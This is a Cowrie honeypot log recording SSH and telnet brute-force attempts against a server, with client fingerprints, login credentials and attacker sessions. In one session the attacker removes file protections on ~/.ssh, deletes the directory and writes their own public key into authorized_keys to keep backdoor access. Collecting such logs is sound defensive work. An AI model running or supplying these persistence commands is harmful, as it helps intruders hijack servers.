{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:27.376721Z","src_ip":"212.227.235.229","session":"e00853b7f944"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:27.382838Z","src_ip":"212.227.235.229","session":"81155d6a895c"}
{"eventid":"cowrie.session.closed","duration":12.880465745925903,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:27.856560Z","src_ip":"202.107.95.221","session":"b6f87df79cee"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":38676,"dst_ip":"1.2.3.4","dst_port":23,"session":"fc8a5794e8a8","protocol":"telnet","message":"New connection: 202.107.95.221:38676 (1.2.3.4:23) [session: fc8a5794e8a8]","sensor":"my-vps","timestamp":"2025-09-08T22:17:28.095761Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45230,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dfa438ecc10","protocol":"ssh","message":"New connection: 212.227.235.229:45230 (1.2.3.4:22) [session: 0dfa438ecc10]","sensor":"my-vps","timestamp":"2025-09-08T22:17:29.645240Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:17:29.646070Z","src_ip":"212.227.235.229","session":"0dfa438ecc10"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:17:29.947875Z","src_ip":"212.227.235.229","session":"0dfa438ecc10"}
{"eventid":"cowrie.login.success","username":"root","password":"changeme123","message":"login attempt [root/changeme123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:17:31.193527Z","src_ip":"212.227.235.229","session":"0dfa438ecc10"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:17:31.815468Z","src_ip":"212.227.235.229","session":"0dfa438ecc10"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:17:31.816183Z","src_ip":"212.227.235.229","session":"0dfa438ecc10"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:17:31.817385Z","src_ip":"212.227.235.229","session":"0dfa438ecc10"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:32.119413Z","src_ip":"212.227.235.229","session":"0dfa438ecc10"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:17:32.822988Z","src_ip":"212.227.235.229","session":"0dfa438ecc10"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:17:32.823749Z","src_ip":"212.227.235.229","session":"0dfa438ecc10"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:17:33.129472Z","src_ip":"212.227.235.229","session":"0dfa438ecc10"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:33.130375Z","src_ip":"212.227.235.229","session":"0dfa438ecc10"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45246,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ffd186b4175","protocol":"ssh","message":"New connection: 212.227.235.229:45246 (1.2.3.4:22) [session: 0ffd186b4175]","sensor":"my-vps","timestamp":"2025-09-08T22:17:33.478294Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:17:33.479241Z","src_ip":"212.227.235.229","session":"0ffd186b4175"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51108,"dst_ip":"1.2.3.4","dst_port":22,"session":"029b6bbdd713","protocol":"ssh","message":"New connection: 212.227.235.229:51108 (1.2.3.4:22) [session: 029b6bbdd713]","sensor":"my-vps","timestamp":"2025-09-08T22:17:33.794088Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:17:33.795003Z","src_ip":"212.227.235.229","session":"029b6bbdd713"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:17:33.803452Z","src_ip":"212.227.235.229","session":"0ffd186b4175"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:17:34.129379Z","src_ip":"212.227.235.229","session":"029b6bbdd713"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:17:35.142185Z","src_ip":"212.227.235.229","session":"0ffd186b4175"}
{"eventid":"cowrie.login.failed","username":"config","password":"111","message":"login attempt [config/111] failed","sensor":"my-vps","timestamp":"2025-09-08T22:17:35.504381Z","src_ip":"212.227.235.229","session":"029b6bbdd713"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:36.469035Z","src_ip":"212.227.235.229","session":"0ffd186b4175"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45250,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c0f33149e99","protocol":"ssh","message":"New connection: 212.227.235.229:45250 (1.2.3.4:22) [session: 7c0f33149e99]","sensor":"my-vps","timestamp":"2025-09-08T22:17:36.782220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:17:36.783004Z","src_ip":"212.227.235.229","session":"7c0f33149e99"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:36.841299Z","src_ip":"212.227.235.229","session":"029b6bbdd713"}
{"eventid":"cowrie.session.closed","duration":12.896917343139648,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:36.967094Z","src_ip":"202.107.95.221","session":"b36bfa28ac25"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:17:37.098603Z","src_ip":"212.227.235.229","session":"7c0f33149e99"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":38816,"dst_ip":"1.2.3.4","dst_port":23,"session":"4b482c6e575f","protocol":"telnet","message":"New connection: 202.107.95.221:38816 (1.2.3.4:23) [session: 4b482c6e575f]","sensor":"my-vps","timestamp":"2025-09-08T22:17:37.127740Z"}
{"eventid":"cowrie.session.closed","duration":12.641376972198486,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:37.893058Z","src_ip":"202.107.95.221","session":"3d5e9fb9ae63"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":38836,"dst_ip":"1.2.3.4","dst_port":23,"session":"d6bb02351274","protocol":"telnet","message":"New connection: 202.107.95.221:38836 (1.2.3.4:23) [session: d6bb02351274]","sensor":"my-vps","timestamp":"2025-09-08T22:17:38.064096Z"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:17:38.402144Z","src_ip":"212.227.235.229","session":"7c0f33149e99"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:38.698612Z","src_ip":"212.227.235.229","session":"0dfa438ecc10"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:38.719336Z","src_ip":"212.227.235.229","session":"7c0f33149e99"}
{"eventid":"cowrie.session.closed","duration":12.736388444900513,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:40.832089Z","src_ip":"202.107.95.221","session":"fc8a5794e8a8"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":38957,"dst_ip":"1.2.3.4","dst_port":23,"session":"122ac11980ad","protocol":"telnet","message":"New connection: 202.107.95.221:38957 (1.2.3.4:23) [session: 122ac11980ad]","sensor":"my-vps","timestamp":"2025-09-08T22:17:40.965194Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58026,"dst_ip":"1.2.3.4","dst_port":22,"session":"af260ca3e227","protocol":"ssh","message":"New connection: 212.227.125.160:58026 (1.2.3.4:22) [session: af260ca3e227]","sensor":"my-vps","timestamp":"2025-09-08T22:17:46.946565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-09-08T22:17:47.955509Z","src_ip":"212.227.125.160","session":"af260ca3e227"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-09-08T22:17:48.946617Z","src_ip":"212.227.125.160","session":"af260ca3e227"}
{"eventid":"cowrie.session.closed","duration":13.629321336746216,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:50.756963Z","src_ip":"202.107.95.221","session":"4b482c6e575f"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":39115,"dst_ip":"1.2.3.4","dst_port":23,"session":"a16f1f3a89a6","protocol":"telnet","message":"New connection: 202.107.95.221:39115 (1.2.3.4:23) [session: a16f1f3a89a6]","sensor":"my-vps","timestamp":"2025-09-08T22:17:50.757827Z"}
{"eventid":"cowrie.session.closed","duration":12.827605962753296,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:50.890587Z","src_ip":"202.107.95.221","session":"d6bb02351274"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":39146,"dst_ip":"1.2.3.4","dst_port":23,"session":"bbcb043adee7","protocol":"telnet","message":"New connection: 202.107.95.221:39146 (1.2.3.4:23) [session: bbcb043adee7]","sensor":"my-vps","timestamp":"2025-09-08T22:17:51.117831Z"}
{"eventid":"cowrie.session.closed","duration":13.08125925064087,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:54.046350Z","src_ip":"202.107.95.221","session":"122ac11980ad"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":39161,"dst_ip":"1.2.3.4","dst_port":23,"session":"a4f943d6f488","protocol":"telnet","message":"New connection: 202.107.95.221:39161 (1.2.3.4:23) [session: a4f943d6f488]","sensor":"my-vps","timestamp":"2025-09-08T22:17:54.226465Z"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:54.372880Z","src_ip":"212.227.125.160","session":"af260ca3e227"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32904,"dst_ip":"1.2.3.4","dst_port":22,"session":"efb45c22efdd","protocol":"ssh","message":"New connection: 212.227.235.229:32904 (1.2.3.4:22) [session: efb45c22efdd]","sensor":"my-vps","timestamp":"2025-09-08T22:18:01.916631Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:18:01.917399Z","src_ip":"212.227.235.229","session":"efb45c22efdd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:18:02.212004Z","src_ip":"212.227.235.229","session":"efb45c22efdd"}
{"eventid":"cowrie.login.failed","username":"app","password":"2025","message":"login attempt [app/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T22:18:03.432742Z","src_ip":"212.227.235.229","session":"efb45c22efdd"}
{"eventid":"cowrie.session.closed","duration":12.871831178665161,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:03.989595Z","src_ip":"202.107.95.221","session":"bbcb043adee7"}
{"eventid":"cowrie.session.closed","duration":13.342634201049805,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:04.100411Z","src_ip":"202.107.95.221","session":"a16f1f3a89a6"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":39346,"dst_ip":"1.2.3.4","dst_port":23,"session":"c6d93f5389ca","protocol":"telnet","message":"New connection: 202.107.95.221:39346 (1.2.3.4:23) [session: c6d93f5389ca]","sensor":"my-vps","timestamp":"2025-09-08T22:18:04.152979Z"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":39350,"dst_ip":"1.2.3.4","dst_port":23,"session":"31e49e26f269","protocol":"telnet","message":"New connection: 202.107.95.221:39350 (1.2.3.4:23) [session: 31e49e26f269]","sensor":"my-vps","timestamp":"2025-09-08T22:18:04.297480Z"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:04.728891Z","src_ip":"212.227.235.229","session":"efb45c22efdd"}
{"eventid":"cowrie.session.closed","duration":13.640079259872437,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:07.866474Z","src_ip":"202.107.95.221","session":"a4f943d6f488"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":39378,"dst_ip":"1.2.3.4","dst_port":23,"session":"0dc921992ed6","protocol":"telnet","message":"New connection: 202.107.95.221:39378 (1.2.3.4:23) [session: 0dc921992ed6]","sensor":"my-vps","timestamp":"2025-09-08T22:18:08.046320Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57054,"dst_ip":"1.2.3.4","dst_port":22,"session":"732a3cc4c127","protocol":"ssh","message":"New connection: 217.72.205.35:57054 (1.2.3.4:22) [session: 732a3cc4c127]","sensor":"my-vps","timestamp":"2025-09-08T22:18:08.857741Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:08.858890Z","src_ip":"217.72.205.35","session":"732a3cc4c127"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51782,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c08ea6714a8","protocol":"ssh","message":"New connection: 212.227.235.229:51782 (1.2.3.4:22) [session: 0c08ea6714a8]","sensor":"my-vps","timestamp":"2025-09-08T22:18:08.939938Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:18:08.940623Z","src_ip":"212.227.235.229","session":"0c08ea6714a8"}
